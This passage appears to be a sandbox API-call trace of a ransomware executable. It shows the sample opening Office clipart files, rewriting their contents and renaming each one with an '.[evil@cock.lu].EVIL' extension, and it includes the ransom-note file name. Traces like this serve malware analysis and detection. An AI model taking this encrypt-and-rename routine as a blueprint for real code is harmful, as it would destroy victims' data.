[0134.047] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105238.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105238.wmf.[evil@cock.lu].evil")) returned 1 [0134.048] ??_V@YAXPEAX@Z () returned 0x1 [0134.051] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF", dwFileAttributes=0x200) returned 0 [0134.052] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0134.052] wcsstr (_Str="J0105240.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0134.052] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF") returned 69 [0134.052] wcscmp (_String1="J0105240.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0134.052] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105240.WMF") returned 0x0 [0134.052] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF") returned 0x45 [0134.052] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105240.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0134.058] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2d0c, lpOverlapped=0x0) returned 1 [0134.110] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0134.110] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0134.110] _errno () returned 0x84b1160840 [0134.110] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.110] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x2d20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2d20, lpOverlapped=0x0) returned 1 [0134.153] CloseHandle (hObject=0x1a8) returned 1 [0134.153] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0134.153] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0134.154] __uncaught_exception () returned 0x84b1160800 [0134.154] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0134.154] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105240.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105240.wmf.[evil@cock.lu].evil")) returned 1 [0134.155] ??_V@YAXPEAX@Z () returned 0x1 [0134.157] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF", dwFileAttributes=0x200) returned 0 [0134.157] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0134.157] wcsstr (_Str="J0105244.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0134.157] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF") returned 69 [0134.157] wcscmp (_String1="J0105244.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0134.157] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105244.WMF") returned 0x0 [0134.157] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF") returned 0x45 [0134.157] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105244.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0134.160] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2bdc, lpOverlapped=0x0) returned 1 [0134.191] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0134.191] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0134.191] _errno () returned 0x84b1160840 [0134.191] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.191] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x2be0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2be0, lpOverlapped=0x0) returned 1 [0134.192] CloseHandle (hObject=0x1a8) returned 1 [0134.192] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0134.192] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0134.192] __uncaught_exception () returned 0x84b1160800 [0134.192] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0134.193] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105244.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105244.wmf.[evil@cock.lu].evil")) returned 1 [0134.193] ??_V@YAXPEAX@Z () returned 0x1 [0134.197] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF", dwFileAttributes=0x200) returned 0 [0134.197] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0134.197] wcsstr (_Str="J0105246.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0134.197] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF") returned 69 [0134.197] wcscmp (_String1="J0105246.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0134.197] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105246.WMF") returned 0x0 [0134.197] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF") returned 0x45 [0134.198] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105246.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0134.201] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4b80, lpOverlapped=0x0) returned 1 [0134.216] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0134.216] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0134.216] _errno () returned 0x84b1160840 [0134.216] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.216] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x4ba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ba0, lpOverlapped=0x0) returned 1 [0134.216] CloseHandle (hObject=0x1a8) returned 1 [0134.216] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0134.216] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0134.216] __uncaught_exception () returned 0x84b1160800 [0134.216] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0134.217] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105246.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105246.wmf.[evil@cock.lu].evil")) returned 1 [0134.217] ??_V@YAXPEAX@Z () returned 0x1 [0134.220] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF", dwFileAttributes=0x200) returned 0 [0134.220] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0134.220] wcsstr (_Str="J0105250.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0134.220] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF") returned 69 [0134.220] wcscmp (_String1="J0105250.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0134.220] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105250.WMF") returned 0x0 [0134.220] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF") returned 0x45 [0134.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105250.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0134.222] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1214, lpOverlapped=0x0) returned 1 [0134.268] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0134.268] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0134.268] _errno () returned 0x84b1160840 [0134.268] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.268] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1220, lpOverlapped=0x0) returned 1 [0134.268] CloseHandle (hObject=0x1a8) returned 1 [0134.268] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0134.269] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0134.269] __uncaught_exception () returned 0x84b1160800 [0134.269] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0134.269] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105250.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105250.wmf.[evil@cock.lu].evil")) returned 1 [0134.270] ??_V@YAXPEAX@Z () returned 0x1 [0134.274] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF", dwFileAttributes=0x200) returned 0 [0134.274] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0134.274] wcsstr (_Str="J0105266.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0134.274] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF") returned 69 [0134.274] wcscmp (_String1="J0105266.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0134.274] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105266.WMF") returned 0x0 [0134.274] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF") returned 0x45 [0134.274] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105266.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0134.277] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1714, lpOverlapped=0x0) returned 1 [0135.427] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.427] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.427] _errno () returned 0x84b1160840 [0135.427] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.427] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1720, lpOverlapped=0x0) returned 1 [0135.427] CloseHandle (hObject=0x1a8) returned 1 [0135.427] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0135.427] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0135.427] __uncaught_exception () returned 0x84b1160800 [0135.428] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0135.428] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105266.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105266.wmf.[evil@cock.lu].evil")) returned 1 [0135.428] ??_V@YAXPEAX@Z () returned 0x1 [0135.431] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF", dwFileAttributes=0x200) returned 0 [0135.431] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0135.431] wcsstr (_Str="J0105272.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0135.431] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF") returned 69 [0135.431] wcscmp (_String1="J0105272.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0135.431] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105272.WMF") returned 0x0 [0135.431] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF") returned 0x45 [0135.431] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105272.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0135.443] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4540, lpOverlapped=0x0) returned 1 [0135.461] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.461] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.461] _errno () returned 0x84b1160840 [0135.461] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.461] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4560, lpOverlapped=0x0) returned 1 [0135.473] CloseHandle (hObject=0x1a8) returned 1 [0135.473] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0135.473] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0135.473] __uncaught_exception () returned 0x84b1160800 [0135.473] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0135.473] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105272.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105272.wmf.[evil@cock.lu].evil")) returned 1 [0135.474] ??_V@YAXPEAX@Z () returned 0x1 [0135.477] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF", dwFileAttributes=0x200) returned 0 [0135.477] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0135.477] wcsstr (_Str="J0105276.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0135.477] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF") returned 69 [0135.477] wcscmp (_String1="J0105276.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0135.477] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105276.WMF") returned 0x0 [0135.477] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF") returned 0x45 [0135.477] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105276.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0135.481] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4b28, lpOverlapped=0x0) returned 1 [0135.503] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.503] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.503] _errno () returned 0x84b1160840 [0135.503] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.503] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x4b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4b40, lpOverlapped=0x0) returned 1 [0135.503] CloseHandle (hObject=0x1a8) returned 1 [0135.503] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0135.504] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0135.504] __uncaught_exception () returned 0x84b1160800 [0135.504] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0135.504] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105276.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105276.wmf.[evil@cock.lu].evil")) returned 1 [0135.505] ??_V@YAXPEAX@Z () returned 0x1 [0135.508] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF", dwFileAttributes=0x200) returned 0 [0135.509] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0135.509] wcsstr (_Str="J0105280.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0135.509] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105280.WMF") returned 69 [0135.509] wcscmp (_String1="J0105280.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0135.509] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105280.WMF") returned 0x0 [0135.509] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105280.WMF") returned 0x45 [0135.509] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105280.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105280.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0135.511] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2d14, lpOverlapped=0x0) returned 1 [0135.565] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.565] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0135.565] _errno () returned 0x84b1160840 [0135.565] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.565] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x2d20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2d20, lpOverlapped=0x0) returned 1 [0135.565] CloseHandle (hObject=0x1a8) returned 1 [0135.565] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105280.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0135.565] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0135.565] __uncaught_exception () returned 0x84b1160800 [0135.565] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0135.566] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105280.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105280.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105280.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105280.wmf.[evil@cock.lu].evil")) returned 1 [0135.566] ??_V@YAXPEAX@Z () returned 0x1 [0135.569] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft 